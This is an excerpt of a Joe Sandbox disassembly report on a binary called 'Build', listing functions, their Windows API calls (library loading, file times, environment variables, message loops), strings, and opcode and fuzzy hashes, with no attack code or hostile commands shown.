Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3To
API String ID: 3498096277-2168385784
Opcode ID: 092929bd5a1c1bfd4d326a6d352a26eb274a03055584b811f4ee1ea938b37dfc
Instruction ID: 258e157db5cc1fed03d4ff06eef1812b70e9cf7ccd8b5da75de7dd2627f4f428
Opcode Fuzzy Hash: 092929bd5a1c1bfd4d326a6d352a26eb274a03055584b811f4ee1ea938b37dfc
Instruction Fuzzy Hash: 48F012B1D04219ABCB11AF9AD849DEFFFFCEF94704F004056E815E2251D7B856458FA1

Function 003712F6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003728AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003728D4
Part of subcall function 003728AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00371309,Crypt32.dll,00000000,00371383,00000200,?,00371366,00000000,00000000,?), ref: 003728F4

GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 00371315
GetProcAddress.KERNEL32(003AC1F0,CryptUnprotectMemory), ref: 00371325

Strings

CryptUnprotectMemory, xrefs: 0037131B
CryptProtectMemory, xrefs: 0037130F
Crypt32.dll, xrefs: 003712FF

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 4dffdb64df0187df9c1e3c497429b18d013ced502f317cfe041b10f3679f93f9
Instruction ID: 693d53650dd2ebfc4a7a24f1a429fe0a6279a729779db7899d5956472a28db8e
Opcode Fuzzy Hash: 4dffdb64df0187df9c1e3c497429b18d013ced502f317cfe041b10f3679f93f9
Instruction Fuzzy Hash: 8EE08675A467019EEB335F38994AB82BEE45F28700F05C81DE0DA93640D6B9D8408B50

Function 0036B2B0 Relevance: 7.6, APIs: 5, Instructions: 119
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00368846,?,00000005), ref: 0036B342
GetLastError.KERNEL32(?,?,00368846,?,00000005), ref: 0036B34F
CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00368846,?,00000005), ref: 0036B382
GetLastError.KERNEL32(?,?,00368846,?,00000005), ref: 0036B38A
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00368846,?,00000005), ref: 0036B3D9

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 0edfd53f84c6166edcd6d6f0a8389de98d9cf23959d74085aa8a3157fb8d54de
Instruction ID: 8840caf2292e2d8efc62ed8212214268bd2f45ecc229e02a49da1cdfb123bca4
Opcode Fuzzy Hash: 0edfd53f84c6166edcd6d6f0a8389de98d9cf23959d74085aa8a3157fb8d54de
Instruction Fuzzy Hash: DB414830649745AFD322DF24CC46B9AFBD8BB45320F204A1AF9A1D63C1D7B19998CF91

Function 0037D864 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037D875
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037D886
IsDialogMessageW.USER32(0001048A,?), ref: 0037D89A
TranslateMessage.USER32(?), ref: 0037D8A8
DispatchMessageW.USER32(?), ref: 0037D8B2

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: bdc074858f7479048468a78af8d93fc83aa258feaa44bb484fb2f84765c5b807
Instruction ID: 77d5617aa3ed49cd160771b57ac9b3437d8a03b25cddb0b346cc0742f2a75fc7
Opcode Fuzzy Hash: bdc074858f7479048468a78af8d93fc83aa258feaa44bb484fb2f84765c5b807
Instruction Fuzzy Hash: 26F0DA7190522ABBDB21ABE6DC4CDEB7F7CEE06391B008415B91AD2050E728E506CFB0

Function 0037CB49 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 0037CB6A
SHAutoComplete.SHLWAPI(?,00000010), ref: 0037CBA1

Part of subcall function 00374168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,0036E084,00000000,.exe,?,?,00000800,?,?,?,0037AD5D), ref: 0037417E

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0037CB91

Strings

EDIT, xrefs: 0037CB75, 0037CB80, 0037CB8D

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 80aae1f4979312e277529b7f1deabe95613019dc895ce7f53a995e1f55e711b1
Instruction ID: ae99ac6795973d3dffe5277c2ba2939022c038eea6b03d3f0e7535c61120d37b
Opcode Fuzzy Hash: 80aae1f4979312e277529b7f1deabe95613019dc895ce7f53a995e1f55e711b1
Instruction Fuzzy Hash: 18F0C831611314ABDB229B258C06F9FB7AC9F86B00F014059F945FB180D774EA058BA5

Function 0037FFDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0037FFFE
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00380038

Strings

sfxcmd, xrefs: 0037FFF9
sfxpar, xrefs: 00380033

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 87382865b1bed7796fb665aecda8c0caedda91676ad9bb9dfb3455f0640b9ec6
Instruction ID: 6b49209f757ef866c18dd0ec7f80fe72047538a672d04ffaa73983f6621ecfdb
Opcode Fuzzy Hash: 87382865b1bed7796fb665aecda8c0caedda91676ad9bb9dfb3455f0640b9ec6
Instruction Fuzzy Hash: 33F0F6B5901324ABCB27BBA48C069BF739CEF0EB40B014096FD45AB181DAB59D41C7A1

Function 00386232 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000011,00000000,00000800,?,003861E3,00000000,00000001,003C60C8,?,?,?,00386386,00000004,InitializeCriticalSectionEx,00399624,InitializeCriticalSectionEx), ref: 0038623F
GetLastError.KERNEL32(?,003861E3,00000000,00000001,003C60C8,?,?,?,00386386,00000004,InitializeCriticalSectionEx,00399624,InitializeCriticalSectionEx,00000000,?,0038613D), ref: 00386249
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00385083), ref: 00386271

Strings

api-ms-, xrefs: 00386256

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: de0f3e900943bbafd186b06e2e2057470fdbf216fb0a084dc360ce6189864eba
Instruction ID: 1f56f066a7e25838e21a2379c50b660e6650279048c1a1e0b4c403beea4612ba
Opcode Fuzzy Hash: de0f3e900943bbafd186b06e2e2057470fdbf216fb0a084dc360ce6189864eba
Instruction Fuzzy Hash: 03E04F30681304B7EF232F60EC07F593F79AB00B51F1108A1F94DA80E0EBA299509684

Function 0036B151 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,0036B662,?,?,00000000,?,?), ref: 0036B161
ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,0036B662,?,?,00000000,?,?), ref: 0036B179
GetLastError.KERNEL32(?,?,?,00000000,0036B662,?,?,00000000,?,?), ref: 0036B1AB
GetLastError.KERNEL32(?,?,?,00000000,0036B662,?,?,00000000,?,?), ref: 0036B1CA

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 60c2b32cae39f2ea5b40e12754b378a01a3235c31888eb96c79f179142247695
Instruction ID: 4449cd5260311f2b9e9b1c082dcd9438673480e7925187559993d2aaec027a30
Opcode Fuzzy Hash: 60c2b32cae39f2ea5b40e12754b378a01a3235c31888eb96c79f179142247695
Instruction Fuzzy Hash: D2117C30904618FBDB235F20C825A6AB7ADBB423A1F10C62AE826C5294DB71DEC4DF51

Function 0038D384 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,0038688D,00000000,00000000,?,0038D32B,0038688D,00000000,00000000,00000000,?,0038D528,00000006,FlsSetValue), ref: 0038D3B6
GetLastError.KERNEL32(?,0038D32B,0038688D,00000000,00000000,00000000,?,0038D528,00000006,FlsSetValue,0039AC00,FlsSetValue,00000000,00000364,?,0038BA77), ref: 0038D3C2
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0038D32B,0038688D,00000000,00000000,00000000,?,0038D528,00000006,FlsSetValue,0039AC00,FlsSetValue,00000000), ref: 0038D3D0

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: d396a2798e4ab12dd6c894c595f6194215bddf28a21d213a76eaace77ad48595
Instruction ID: 8ded584d2c050ceeda3e7867da698f0c9ff4d43686b739ea34d0a4b2436e8904
Opcode Fuzzy Hash: d396a2798e4ab12dd6c894c595f6194215bddf28a21d213a76eaace77ad48595
Instruction Fuzzy Hash: BE01F73A212726ABCB236B699C85A57375CEF047A1B220660F956D72C0CB61D800C7E1

Function 0038E077 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 0038B9A5: GetLastError.KERNEL32(?,003A50C4,00386E12,003A50C4,?,?,0038688D,?,?,003A50C4), ref: 0038B9A9
Part of subcall function 0038B9A5: _free.LIBCMT ref: 0038B9DC
Part of subcall function 0038B9A5: SetLastError.KERNEL32(00000000,?,003A50C4), ref: 0038BA1D
Part of subcall function 0038B9A5: _abort.LIBCMT ref: 0038BA23

Part of subcall function 0038E19E: _abort.LIBCMT ref: 0038E1D0
Part of subcall function 0038E19E: _free.LIBCMT ref: 0038E204

Part of subcall function 0038DE0B: GetOEMCP.KERNEL32(00000000,?,?,0038E094,?), ref: 0038DE36

_free.LIBCMT ref: 0038E0EF
_free.LIBCMT ref: 0038E125

Strings

p,:, xrefs: 0038E119

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID: p,:
API String ID: 2991157371-1418527582
Opcode ID: 4493291ebe86d4135014a5d3b99d1fcb71b74ebad69bfcb837bdb4159d192adf
Instruction ID: 4bf94a18f65e0fc82179f7ba3d2caa1fb32ed45150c3be5b5ed5887bbb9293b1
Opcode Fuzzy Hash: 4493291ebe86d4135014a5d3b99d1fcb71b74ebad69bfcb837bdb4159d192adf
Instruction Fuzzy Hash: 6C31C271904309AFDB12FFAAD445AADB7F5EF41320F2540E9E4049B291EBB69D41CB50

Function 0037136B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 003712F6: GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 00371315
Part of subcall function 003712F6: GetProcAddress.KERNEL32(003AC1F0,CryptUnprotectMemory), ref: 00371325

GetCurrentProcessId.KERNEL32(?,00000200,?,00371366), ref: 003713F9

Strings

CryptProtectMemory failed, xrefs: 003713B0
CryptUnprotectMemory failed, xrefs: 003713F1

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 293c2d5081e006e63cd15b66af5e08fe2222c870fa425523de1e98cfb5b44a86
Instruction ID: 7476706a732f7fb9973538b8ee8dbeb79e2a4101e333ff3e8f77eee8c54e7000
Opcode Fuzzy Hash: 293c2d5081e006e63cd15b66af5e08fe2222c870fa425523de1e98cfb5b44a86
Instruction Fuzzy Hash: 94115936601224ABEF37AB2ADC0296E3B7CEF01724B01C126FC156F253D6389D4187D0

Function 00373105 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00010000,Function_00013240,?,00000000,?), ref: 00373129
SetThreadPriority.KERNEL32(00000000,00000000), ref: 00373170

Part of subcall function 00367BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00367BD5

Strings

CreateThread failed, xrefs: 00373135

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 490ee1374e8bce1464c6a7f59dce4c27c5f6100578a7e4b787809649890db588
Instruction ID: 736e7c3cd4dbdacc1795971fb46a576b7e3d739d65c0575c47d5e07966542357
Opcode Fuzzy Hash: 490ee1374e8bce1464c6a7f59dce4c27c5f6100578a7e4b787809649890db588
Instruction Fuzzy Hash: B90149B53083066FD333BF50DC82FA277A8EB42711F20412EF6855B1C0CAE1A8409664

Function 0038AABA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 0038E580: GetEnvironmentStringsW.KERNEL32 ref: 0038E589
Part of subcall function 0038E580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0038E5AC
Part of subcall function 0038E580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0038E5D2
Part of subcall function 0038E580: _free.LIBCMT ref: 0038E5E5
Part of subcall function 0038E580: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0038E5F4

_free.LIBCMT ref: 0038AB00
_free.LIBCMT ref: 0038AB07

Strings

pb<, xrefs: 0038AAED

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID: pb<
API String ID: 400815659-3541353696
Opcode ID: 2b82d84a6000f6baa6cb3c145b8e35a29d9a545370c364746845c97d814cd6a2
Instruction ID: 4bb54f7250401fd01e6a5d2b36bb1b2788675c9f4dd21fcbd42f89de77147233
Opcode Fuzzy Hash: 2b82d84a6000f6baa6cb3c145b8e35a29d9a545370c364746845c97d814cd6a2
Instruction Fuzzy Hash: 0CE0E512A05B1156F76B767FAC03EAB01298F82370B1106DBF521CF5C2EE988C015393

Function 003705C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00367BEB,?,00361436,00367BEB), ref: 003705F8
LoadStringW.USER32(00367BEB,?,00361436), ref: 0037060F

Strings

pP:, xrefs: 003705D6

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: LoadString
String ID: pP:
API String ID: 2948472770-3607573924
Opcode ID: 23c230ae01d44915159d12ab8280d60b49f3053ee44bf191ac3a1abb281c9343
Instruction ID: dbc37232444ac0b5b26ed2623a2185a9d7aedc51944dc94a6d458615ef28f5e1
Opcode Fuzzy Hash: 23c230ae01d44915159d12ab8280d60b49f3053ee44bf191ac3a1abb281c9343
Instruction Fuzzy Hash: 71F0DF35101218FB8F125F55EC18CAB7F6EFF4A394B048025FD0886121D2329860ABA0

Function 0036B9BA Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,0036F306,00000001,?,?,?,00000000,00377564,?,?,?,?), ref: 0036B9DE
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0036BA25
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0036F306,00000001,?,?,?), ref: 0036BA51

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 5347f34eb0a4de51bbe4f4957c12e7d5aab28ae5022e95119e3c240eb6d1810e
